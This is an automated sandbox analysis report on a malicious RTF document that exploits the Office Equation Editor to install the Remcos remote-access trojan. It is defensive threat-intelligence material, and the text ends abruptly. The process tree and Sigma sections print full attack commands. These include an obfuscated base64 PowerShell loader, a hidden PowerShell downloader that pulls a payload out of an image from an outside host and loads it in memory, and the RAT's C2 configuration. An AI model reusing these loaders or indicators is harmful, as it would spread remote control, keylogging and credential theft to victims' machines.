Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nU7Z8sPyvf.rtf

Overview

General Information

Sample name:nU7Z8sPyvf.rtf
renamed because original name is a hash value
Original sample name:0aba1094e29ed6d65fa5a8b1ec8c2e57.rtf
Analysis ID:1434624
MD5:0aba1094e29ed6d65fa5a8b1ec8c2e57
SHA1:5eb1d60525661ec561ae7e56ed2a5798c0462c1e
SHA256:45ba5f0e0f5ea330c12f0081f8861a75e65f2849e67038c6106930dd66543186
Tags:rtf
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Sigma detected: Remcos
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected VBS Downloader Generic
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Command shell drops VBS files
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Creates autostart registry keys with suspicious values (likely registry only malware)
Delayed program exit found
Document exploit detected (process start blacklist hit)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1892 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 152 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3148 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreTQBSDgTreEgDgTreSDgTreDgTrevDgTreDgDgTreODgTreDgTrewDgTreDgDgTreMgDgTrevDgTreDYDgTreLgDgTrexDgTreDMDgTreLgDgTreyDgTreDcDgTreMQDgTreuDgTreDcDgTreMDgTreDgTrexDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBhDgTreG4DgTredDgTreByDgTreGUDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • cmd.exe (PID: 3752 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\antre.vbs" MD5: AD7B9C14083B52BC532FBA5948342B98)
            • RegAsm.exe (PID: 3800 cmdline: "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
    • EQNEDT32.EXE (PID: 3420 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • wscript.exe (PID: 3968 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\antre.vbs" MD5: 045451FA238A75305CC26AC982472367)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-999Z97", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "nots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
nU7Z8sPyvf.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0xa53:$obj2: \objdata
  • 0xa3d:$obj3: \objupdate
  • 0xa19:$obj4: \objemb

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\note\nots.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbsJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\indexphppagenotfound[1].gifJoeSecurity_VBS_Downloader_GenericYara detected VBS Downloader GenericJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6c4a8:$a1: Remcos restarted by watchdog!
              • 0x6ca20:$a3: %02i:%02i:%02i:%03i
              0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
              • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
              • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x6656c:$str_b2: Executing file:
              • 0x675ec:$str_b3: GetDirectListeningPort
              • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x67118:$str_b7: \update.vbs
              • 0x66594:$str_b9: Downloaded file:
              • 0x66580:$str_b10: Downloading file:
              • 0x66624:$str_b12: Failed to upload file:
              • 0x675b4:$str_b13: StartForward
              • 0x675d4:$str_b14: StopForward
              • 0x67070:$str_b15: fso.DeleteFile "
              • 0x67004:$str_b16: On Error Resume Next
              • 0x670a0:$str_b17: fso.DeleteFolder "
              • 0x66614:$str_b18: Uploaded file:
              • 0x665d4:$str_b19: Unable to delete:
              • 0x67038:$str_b20: while fso.FileExists("
              • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
              Click to see the 15 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              15.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                15.2.RegAsm.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  10.2.powershell.exe.4449110.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    10.2.powershell.exe.4449110.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      15.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                      • 0x6aaa8:$a1: Remcos restarted by watchdog!
                      • 0x6b020:$a3: %02i:%02i:%02i:%03i
                      Click to see the 15 entries

                      Sigma Signatures

                      Exploits

                      barindex
                      Sigma detected: EQNEDT32.EXE connecting to internet
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 107.172.31.6, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 152, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                      Sigma detected: File Dropped By EQNEDT32EXE
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 152, TargetFilename: C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs

                      Spreading

                      barindex
                      Sigma detected: Powershell download payload from hardcoded c2 list
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; 